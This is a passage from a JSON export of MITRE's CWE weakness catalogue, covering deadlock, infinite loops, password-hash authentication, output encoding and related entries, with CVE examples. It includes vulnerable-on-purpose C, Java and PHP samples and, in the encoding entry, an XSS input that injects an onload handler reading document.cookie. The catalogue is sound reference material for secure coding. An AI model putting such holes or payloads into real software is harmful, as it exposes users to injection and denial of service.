library","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699"},{"Reference":"CVE-2009-4272","Description":"deadlock triggered by packets that force collisions in a routing table","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272"},{"Reference":"CVE-2002-1850","Description":"read/write deadlock between web server and script","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850"},{"Reference":"CVE-2004-0174","Description":"web server deadlock involving multiple listening connections","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174"},{"Reference":"CVE-2009-1388","Description":"multiple simultaneous calls to the same function trigger deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388"},{"Reference":"CVE-2006-5158","Description":"chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158"},{"Reference":"CVE-2006-4342","Description":"deadlock when an operation is performed on a resource while it is being removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342"},{"Reference":"CVE-2006-2374","Description":"Deadlock in device driver triggered by using file handle of a related device.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374"},{"Reference":"CVE-2006-2275","Description":"Deadlock when large number of small messages cannot be processed quickly enough.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275"},{"Reference":"CVE-2005-3847","Description":"OS kernel has deadlock triggered by a signal during a core dump.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847"},{"Reference":"CVE-2005-3106","Description":"Race condition leads to deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK08-J","Entry_Name":"Ensure actively held locks are released on exceptional conditions"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Synchronization Problems&#34;, section &#34;Starvation and Deadlocks&#34;, Page 760"}},{"attr":{"@_External_Reference_ID":"REF-783","@_Section":"Chapter 7, &#34;Concurrency&#34;, section &#34;Mutual Exclusion and Deadlock&#34;, Page 248"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"834":{"attr":{"@_ID":"834","@_Name":"Excessive Iteration","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an iteration or loop without sufficiently limiting the number of times that the loop is executed.","Extended_Description":"If the iteration can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. In many cases, a loop does not need to be infinite in order to cause enough resource consumption to adversely affect the software or its host system; it depends on the amount of resources consumed per iteration.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Amplification","DoS: Crash, Exit, or Restart"],"Note":"Excessive looping will cause unexpected consumption of resources, such as CPU cycles or memory. The software\'s operation may slow down, or cause a long time to respond. If limited resources such as memory are consumed for each iteration, the loop may eventually cause a crash or program exit due to exhaustion of resources, such as an out-of-memory error."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Forced Path Execution"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1027","Description":"Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t      looping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t      the loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Looping Constructs&#34;, Page 327"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"835":{"attr":{"@_ID":"835","@_Name":"Loop with Unreachable Exit Condition (\'Infinite Loop\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.","Extended_Description":"If the loop can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Amplification"],"Note":"An infinite loop will cause unexpected consumption of resources, such as CPU cycles or memory. The software\'s operation may slow down, or cause a long time to respond."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following code the method processMessagesFromServer attempts to establish a connection to a server and read and process messages from the server. The method uses a do/while loop to continue trying to establish the connection to the server when an attempt fails.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessagesFromServer(char *hostaddr, int port) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int servsock;int connected;struct sockaddr_in servaddr;servsock = socket( AF_INET, SOCK_STREAM, 0);memset( &amp;servaddr, 0, sizeof(servaddr));servaddr.sin_family = AF_INET;servaddr.sin_port = htons(port);servaddr.sin_addr.s_addr = inet_addr(hostaddr);do {} while (connected &lt; 0);...","xhtml:br":["","","","","","","","","","","","","","","","",""],"xhtml:i":["// create socket to connect to server","// keep trying to establish connection to the server","// close socket and return success or failure"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"connected = connect(servsock, (struct sockaddr *)&amp;servaddr, sizeof(servaddr));if (connected &gt; -1) {}","xhtml:br":["","","","","",""],"xhtml:i":["// establish connection to server","// if connected then read and process messages from server"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// read and process messages"}}}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int processMessagesFromServer(char *hostaddr, int port) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int count = 0;do {} while (connected &lt; 0 &amp;&amp; count &lt; MAX_ATTEMPTS);...","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// initialize number of attempts counter","// keep trying to establish connection to the server","// up to a maximum number of attempts","// close socket and return success or failure"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"connected = connect(servsock, (struct sockaddr *)&amp;servaddr, sizeof(servaddr));count++;if (connected &gt; -1) {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// establish connection to server","// increment counter","// if connected then read and process messages from server"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// read and process messages"}}}}}}}}],"Body_Text":"However, this will create an infinite loop if the server does not respond. This infinite loop will consume system resources and can be used to create a denial of service attack. To resolve this a counter should be used to limit the number of attempts to establish a connection to the server, as in the following code."},{"Intro_Text":"For this example the method isReorderNeeded as part of a bookstore application that determines if a particular book needs to be reordered based on the current inventory count and the rate at which the book is being sold.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isReorderNeeded(String bookISBN, int rateSold) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isReorder = false;int minimumCount = 10;int days = 0;int inventoryCount = inventory.getIventoryCount(bookISBN);while (inventoryCount &gt; minimumCount) {}if (days &gt; 0 &amp;&amp; days &lt; 5) {}return isReorder;","xhtml:br":["","","","","","","","","","","","","","","","",""],"xhtml:i":["// get inventory count for book","// find number of days until inventory count reaches minimum","// if number of days within reorder timeframe","// set reorder return boolean to true"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"inventoryCount = inventoryCount - rateSold;days++;","xhtml:br":["","",""]}},{"#text":"isReorder = true;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isReorderNeeded(String bookISBN, int rateSold) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (rateSold &lt; 1) {}...","xhtml:br":["","","","",""],"xhtml:i":"// validate rateSold variable","xhtml:div":{"#text":"return isReorder;","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":"However, the while loop will become an infinite loop if the rateSold input parameter has a value of zero since the inventoryCount will never fall below the minimumCount. In this case the input parameter should be validated to ensure that a value of zero does not cause an infinite loop,as in the following code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1027","Description":"Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027"},{"Reference":"CVE-2011-1142","Description":"Chain: self-referential values in recursive definitions lead to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1142"},{"Reference":"CVE-2011-1002","Description":"NULL UDP packet is never cleared from a queue, leading to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t      looping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t      the loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"},{"Reference":"CVE-2010-4476","Description":"Floating point conversion routine cycles back and forth between two different values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476"},{"Reference":"CVE-2010-4645","Description":"Floating point conversion routine cycles back and forth between two different values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4645"},{"Reference":"CVE-2010-2534","Description":"Chain: improperly clearing a pointer in a linked list leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2534"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"},{"Reference":"CVE-2008-3688","Description":"Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-835"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Looping Constructs&#34;, Page 327"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-835"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"836":{"attr":{"@_ID":"836","@_Name":"Use of Password Hash Instead of Password for Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store.","Extended_Description":{"xhtml:p":["Some authentication mechanisms rely on the client to generate the hash for a password, possibly to reduce load on the server or avoid sending the password across the network. However, when the client is used to generate the hash, an attacker can bypass the authentication by obtaining a copy of the hash, e.g. by using SQL injection to compromise a database of authentication credentials, or by exploiting an information exposure. The attacker could then use a modified client to replay the stolen hash without having knowledge of the original password.","As a result, the server-side comparison against a client-side hash does not provide any more security than the use of passwords without hashing."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"602","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could bypass the authentication routine without knowing the original password."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1283","Description":"Product performs authentication with user-supplied password hashes that can be obtained from a separate SQL injection vulnerability (CVE-2009-1282).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1283"},{"Reference":"CVE-2005-3435","Description":"Product allows attackers to bypass authentication by obtaining the password hash for another user and specifying the hash in the pwd argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"652"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"837":{"attr":{"@_ID":"837","@_Name":"Improper Enforcement of a Single, Unique Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software requires that an actor should only be able to perform an action once, or to have only one unique action, but the software does not enforce or improperly enforces this restriction.","Extended_Description":"In various applications, a user is only expected to perform a certain action once, such as voting, requesting a refund, or making a purchase. When this restriction is not enforced, sometimes this can have security implications. For example, in a voting application, an attacker could attempt to \\"stuff the ballot box\\" by voting multiple times. If these votes are counted separately, then the attacker could directly affect who wins the vote. This could have significant business impact depending on the purpose of the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"799","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Other","Note":"An attacker might be able to gain advantage over other users by performing the action multiple times, or affect the correctness of the software."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-0294","Description":"Ticket-booking web application allows a user to lock a seat more than once.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0294"},{"Reference":"CVE-2005-4051","Description":"CMS allows people to rate downloads by voting more than once.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4051"},{"Reference":"CVE-2002-216","Description":"Polling software allows people to vote more than once by setting a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-216"},{"Reference":"CVE-2003-1433","Description":"Chain: lack of validation of a challenge key in a game allows a player to register multiple times and lock other players out of the game.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1433"},{"Reference":"CVE-2002-1018","Description":"Library feature allows attackers to check out the same e-book multiple times, preventing other users from accessing copies of the e-book.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1018"},{"Reference":"CVE-2009-2346","Description":"Protocol implementation allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many message exchanges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"838":{"attr":{"@_ID":"838","@_Name":"Inappropriate Encoding for Output Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component.","Extended_Description":{"xhtml:p":["This weakness can cause the downstream component to use a decoding method that produces different data than what the software intended to send. When the wrong encoding is used - even if closely related - the downstream component could decode the data incorrectly. This can have security consequences when the provided boundaries between control and data are inadvertently broken, because the resulting data could introduce control characters or special elements that were not sent by the software. The resulting data could then be used to bypass protection mechanisms such as input validation, and enable injection attacks.","While using output encoding is essential for ensuring that communications between components are accurate, the use of the wrong encoding - even if closely related - could cause the downstream component to misinterpret the output.","For example, HTML entity encoding is used for elements in the HTML body of a web page. However, a programmer might use entity encoding when generating output for that is used within an attribute of an HTML tag, which could contain functional Javascript that is not affected by the HTML encoding.","While web applications have received the most attention for this problem, this weakness could potentially apply to any type of software that uses a communications stream that could support multiple encodings."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use context-aware encoding. That is, understand which encoding is being used by the downstream component, and ensure that this encoding is used. If an encoding can be specified, do so, instead of assuming that the default encoding is the same as the default being assumed by the downstream component."},{"Phase":"Architecture and Design","Strategy":"Output Encoding","Description":"Where possible, use communications protocols or data formats that provide strict boundaries between control and data. If this is not feasible, ensure that the protocols or formats allow the communicating components to explicitly state which encoding/decoding method is being used. Some template frameworks provide built-in support."},{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.","Note that some template mechanisms provide built-in support for the appropriate encoding."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code dynamically builds an HTML page using POST data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_POST[\'username\'];$picSource = $_POST[\'picsource\'];$picAltText = $_POST[\'picalttext\'];echo \\"&lt;title&gt;Welcome, \\" . htmlentities($username) .\\"&lt;/title&gt;\\";echo \\"&lt;img src=\'\\". htmlentities($picSource) .\\" \' alt=\'\\". htmlentities($picAltText) . \'\\" /&gt;\';","xhtml:br":["","","","","","","",""],"xhtml:i":["...","..."]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"\\"altTextHere\' onload=\'alert(document.cookie)\\""},{"attr":{"@_Nature":"result","@_Language":"HTML"},"xhtml:div":"&lt;img src=\'pic.jpg\' alt=\'altTextHere\' onload=\'alert(document.cookie)\' /&gt;"}],"Body_Text":["The programmer attempts to avoid XSS exploits (CWE-79) by encoding the POST values so they will not be interpreted as valid HTML. However, the htmlentities() encoding is not appropriate when the data are used as HTML attributes, allowing more attributes to be injected.","For example, an attacker can set picAltText to:","This will result in the generated HTML image tag:","The attacker can inject arbitrary javascript into the tag due to this incorrect encoding."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-2814","Description":"Server does not properly handle requests that do not contain UTF-8 data; browser assumes UTF-8, allowing XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2814"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS13-J","Entry_Name":"Use compatible encodings on both sides of file or network IO"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"468"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-786"}},{"attr":{"@_External_Reference_ID":"REF-787"}},{"attr":{"@_External_Reference_ID":"REF-788"}},{"attr":{"@_External_Reference_ID":"REF-789"}},{"attr":{"@_External_Reference_ID":"REF-709","@_Section":"Preventing XSS Attacks"}},{"attr":{"@_External_Reference_ID":"REF-725"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"839":{"attr":{"@_ID":"839","@_Name":"Numeric Range Comparison Without Minimum Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum.","Extended_Description":{"xhtml:p":["Some programs use signed integers or floats even when their values are only expected to be positive or 0. An input validation check might assume that the value is positive, and only check for the maximum value. If the value is negative, but the code assumes that the value is positive, this can produce an error. The error may have security consequences if the negative value is used for memory allocation, array access, buffer access, etc. Ultimately, the error could lead to a buffer overflow or other type of memory corruption.","The use of a negative number in a positive-only context could have security implications for other types of resources. For example, a shopping cart might check that the user is not requesting more than 10 items, but a request for -3 items could cause the application to calculate a negative price and credit the attacker\'s 